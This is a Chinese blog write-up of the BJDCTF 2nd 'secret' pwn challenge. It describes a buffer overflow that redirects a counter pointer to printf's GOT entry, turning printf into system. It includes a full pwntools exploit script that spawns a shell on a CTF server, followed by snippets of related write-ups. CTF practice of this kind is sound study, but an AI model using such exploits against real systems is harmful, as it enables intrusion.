BJDCTF 2nd secret

最新推荐文章于 2021-04-10 15:44:58 发布
最新推荐文章于 2021-04-10 15:44:58 发布
阅读量654 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: PWN CTF 二进制漏洞 安全 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105406611
版权
pwn 同时被 3 个专栏收录
161 篇文章 25 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏

BJDCTF 2nd secret

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

是一个猜数游戏,数值全在代码里,但是有10000个,显然全部抠出来太慢了。

我们再看一下其他函数,发现输入name时,存在缓冲区溢出,可以改写0x000000000046D090处的指针,而该处指针指向count变量,每猜一下,就会对count减1。

然后,我们注意到printf的got表的值比system的got表的值大,并且相差0x10.

因此,我们可以利用溢出,把指针覆盖为printf的got表,然后猜对15次,最后一次猜错。这会导致printf的got表值减去16,也就变成了system的got表一样的值。从而能够调用system。

#coding:utf8
from pwn import *

#sh = process('./secret')
sh = remote('node3.buuoj.cn',26191)
elf = ELF('./secret')
printf_got = elf.got['printf']

answer = [0x476B,0x2D38,0x4540,0x3E77,0x3162,0x3F7D,0x357A,0x3CF5,0x2F9E,0x41EA,0x48D8,0x2763,0x474C,0x3809,0x2E63]
payload = '/bin/sh\x00'.ljust(0x10,'\x00') + p32(printf_got)
sh.sendafter("What's your name?",payload)
for x in answer:
   sh.sendlineafter('Secret:',str(x))
#现在printf的got表被修改为了system_plt
#getshell
sh.sendlineafter('Secret:','1')

sh.interactive()

 

ha1vk
关注
专栏目录
BJDCTF 2nd总结
rreally的博客
03-26 1425
crypto 签到-y1ng 这道题基本上是最常见的体系base64直接解得BJD{W3lc0me_T0_BJDCTF} 老文盲了 这题挺奇葩的,打开发现内容为“罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝”前三个首写为BJD,后面读出来是“大括号这就是flag直接交了吧大括号”,所以提交BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}。 cat_flag 这题出的属于知识盲区,完全没有头绪,直到看讲解时得知可以“喵...
BJDCTF 2nd(WEB复现)
ChenZIDu的博客
04-02 880
记录一下,以后忘记了还能看看 fake google-飞机票 duangShell .index.php.swp源码泄露 一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。 因为exec()无回显,而且没有禁curl。所以可以反弹shell~~ ...
BJDCTF2nd
Amherstieae的博客
05-25 1151
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
[BJDCTF 2nd]secret&&inndy_rop
、moddemod
07-20 521
[BJDCTF 2nd]secret exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './secret' p = process(proc_name) # p = remote('node3.buuoj.cn', 28831)
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1502
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
[BJDCTF 2nd]文件探测
feng的博客
12-19 488
知识点 HTTP响应头 文件包含 代码审计 SSRF sprintf格式化漏洞 session绕过 WP 一道综合性很强的题目,真的很有意思,自己做的时候状态太差连文件包含都没弄出来,实在是太菜了,还是要加油。不过这题真的可以学到很多知识,very nice。 首先进入环境,f12拉到最下面可以看到提示: 看了一下,BJDCTF的传统header里藏东西,看一下header,发现了hint: 除此之外,尝试一下robots.txt: 可以发现admin.php,flag.php是不存在的。 进入h
2.BJDCTF(2020第二届)——Misc杂项题
qwsn
04-02 4390
2.BJDCTF(2020第二届)——Misc杂项题 0x01.题目统计 第一题:[BJDCTF 2nd]最简单的misc-y1ng (1)题目 (2)解压附件得到的压缩包,发现需要密码,我们使用Ziperello暴力破解zip压缩包软件,读取压缩包,发现没有加密的文件;(猜测是伪加密) (3)伪加密解密即可:java -jar ZipCenOp.jar r xxx.zip 解密 (4...
BJDCTF_2nd PWN复盘
weixin_44145820的博客
03-26 694
目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy,看起来是溢出的机会,但是前面判断了长度,这里在汇编下才能发现漏洞 即只要长度超过255就会溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...
-----已搬运-------[BJDCTF 2nd]:文件探测 -- springf()注入漏洞 ---PHP伪协议文件读取 ---ssrf ----PHP代码审计----session密码算法绕过
Zero_Adam的博客
03-15 244
访问网页的时候,后面用#这个定位符可以使得后面的内容失效。 也可以用参数的形式使其失效 比如: q2必须以http://127.0.0.1/开头,不能包含flag顺序出现的字符,后面会拼接y1ng.txt,我们用#注释掉拼接信息,即传入参数http://127.0.0.1/admin.php#,最后执行http://127.0.0.1/admin.php#.y1ng.txt,或者用http://127.0.0.1/admin.php?,最后执行http://127.0.0.1/admin.php?.y1ng
BUU pwn 刷题
qq_36495104的博客
05-19 1575
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
[BUUCTF]PWN——[BJDCTF 2nd]secret
mcmuyanga的博客
12-09 170
[BJDCTF 2nd]secret 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看程序大概的情况,好像是一个什么游戏 64位ida载入,检索程序里的字符串,发现了flag字样 双击,ctrl+x找到了函数 sub_46A3F(),游戏开始界面,让我们输入名字 sub_40136D()函数太长了,没法f5 看汇编,看到首先调用了sub_46A329函数,在sub_46A329里读入了一个数据,off_46D090-1,然后跟标记处的数据比较,如果正确的话,就跳
[BJDCTF 2nd]简单注入
m0_53314778的博客
02-09 197
[BJDCTF 2nd]简单注入 考点:盲注 启动:拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。访问hint.txt 有一条后台查询语句:select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 应该有注入点 回到登入框处,尝试注入,发现加单双引号都被过滤fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入用
BUUCTF(pwn)[BJDCTF 2nd]secret
半岛铁盒的博客
04-10 178
感觉这道题技巧性比较强 有两次输入 一次名字,一次 密码 先进 46A3AF 这里有一次输入 name 看一下 0x40136D的汇编 这里每次有一次 调用 0x46A329,并且 有一次cmp比较; 那么进入 0x46a329 进去看看0x401301 发现 printf_plt 的位置 与 system的位置相差0x10即16 我们可以一开始输入name的时候输入bin/sh; 把0x46d090覆盖为printf_plt, 经过16次输入比较, 前15次输入对的,最后一次输入错
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3152
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
[BJDCTF 2nd]简单注入---关于整数型注入的一些理解
StevenOnesir的博客
12-30 354
本次以BJDCTF的题目,简单对整数型注入做一些讲解。 首先进入界面: 看到的是比较友善的登录界面,考虑题目名称为简单注入,我们直接在密码栏输入 ',发现被过滤。 因此开始考虑整数型注入。 既然闭合了引号防止闭合,这里我们可以猜测后端代码,结合用户名输入进行注入。 在用户名中输入\,可以过滤掉用户名处的最后一个',这是password='这部分的第一个引号将会作为前面字符段的闭合,就可以构造整数型注入。 我们构建第一个payload: username=a password=1 or length(da
Pro Puppet 2nd:开源系统配置管理指南
《Pro Puppet 2nd》是一本专注于介绍Puppet,一个开源的系统配置管理框架和技术工具集的英文原版书籍。该书主要针对IT专业人员,旨在帮助读者深入了解如何利用Puppet来管理和维护计算机系统的配置。全书共分为12章,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值